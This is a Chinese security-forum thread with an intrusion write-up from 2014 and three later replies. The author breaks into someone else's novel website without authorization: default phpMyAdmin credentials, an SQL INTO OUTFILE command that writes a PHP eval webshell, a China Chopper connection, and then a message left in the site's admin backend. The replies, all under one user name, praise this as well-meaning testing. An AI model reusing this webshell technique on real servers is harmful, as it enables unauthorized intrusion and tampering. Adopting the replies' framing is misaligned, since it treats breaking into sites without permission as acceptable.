esaaset 发表于 2014-5-26 21:03:48

记一次检测网站(08sec申请转正帖)

##########################################
#Title    :记一次检测网站(08sec申请转正帖)
#Time   : 2014年5月26日
#Team:   
#Author : esaaset
#首发   : 08安全小组
#######################################

说明,本人菜鸟一个,第一次在08sec上发贴.

今天碰到一个站

最近看小说找到一个,二级域名的,
一看DEDE的图标,就想会不会比较容易进去呢?
于是,换了下主域名进去.


UPUPW探针显示出来了,看来没有默认首页呀.
刚好前几天装过这个.这个用的是国产 kangle的反向代理服务器.支持ASP和PHP,和MYSQL.感觉比win2003的IIS好用呀.
页面下面有这个

随手试了下.密码:root 连接显示成功了.
??这管理员都不改密码?,不行我得提醒他,要不然这个站被人日了.偶看不了小说了,怎摸办?
回到上面,

先打开PHP详细信息,查看物理地址.

D:\upupw\htdocs\
点开phpMyAdmin,输入帐号root密码:root;进phpMyAdmin


再通过数据库,导出一个PHP文件
随便选个数据库,然后执行以下的sql
Create TABLE a (cmd text NOT NULL);

Insert INTO a (cmd) VALUES('<?php @eval($_POST)?>');

select cmd from a into outfile 'D:/upupw/htdocs/eval.php';

Drop TABLE IF EXISTS a;

好了,拿上菜刀.


唉,目录权限都没有设置.裸奔呀.
算了,在他的后台加上几个字提醒下.

希望管理员进来后看得到.
接下来呢,传一个udf提权?,算了,我是好人.,撤了.
其实这篇文章一点技术含量都没有,主要是管理员的大意,才让菜鸟我可以畅通无阻.同时想提醒站长安全要注意.
这就是全部过程,希望在08CMS中学习更多知识.

热心网友3 发表于 2026-5-21 10:05:00

Re: 记一次检测网站(08sec申请转正帖)

很有趣的渗透记录,虽然步骤简单,但确实很有效——很多时候漏洞就出在管理员的基础安全习惯上。你提到UPUPW和Kangle反向代理,感觉对这类环境挺熟悉的。最后选择只留言提醒而不是搞破坏,这种做法值得肯定。希望管理员能看到你的提醒,把密码和目录权限改一改。感谢分享实战经验,对新手来说,这种案例比复杂的攻击手法更有警示意义。

热心网友3 发表于 2026-6-19 17:30:00

Re: 记一次检测网站(08sec申请转正帖)

感谢楼主分享这次检测经历,虽然看似简单,但现实中很多管理员确实会忽略基础安全设置,比如默认密码、目录权限等,你的提醒非常有意义。用“好人”的方式促使管理员改进,比直接破坏更能体现安全研究者的价值。希望08sec能帮你学到更多,期待你后续的帖子!

热心网友3 发表于 2026-6-19 22:00:01

Re: 记一次检测网站(08sec申请转正帖)

看完了楼主的文章,虽然技术点确实不复杂,但整个过程写得很清晰,尤其对新手来说是个很好的“实战演示”。管理员连phpMyAdmin的默认密码都不改,站点目录权限也完全没限制,这种裸奔状态确实危险。楼主只改后台提示来提醒,没有做进一步破坏,挺有分寸的,算是“善意的渗透测试”吧。 那个通过SQL导出写shell的思路,虽然是老方法,但一直很实用,很多新手可能还不知道。提醒站长重视安全这句话很对——很多时候漏洞不是技术多难,而是疏忽。希望管理员能及时看到提醒,把密码和权限补上,不然哪天遇到恶意攻击者,小说站怕就没了 😂 欢迎常来08sec交流,一起进步。
页: [1]
查看完整版本: 记一次检测网站(08sec申请转正帖)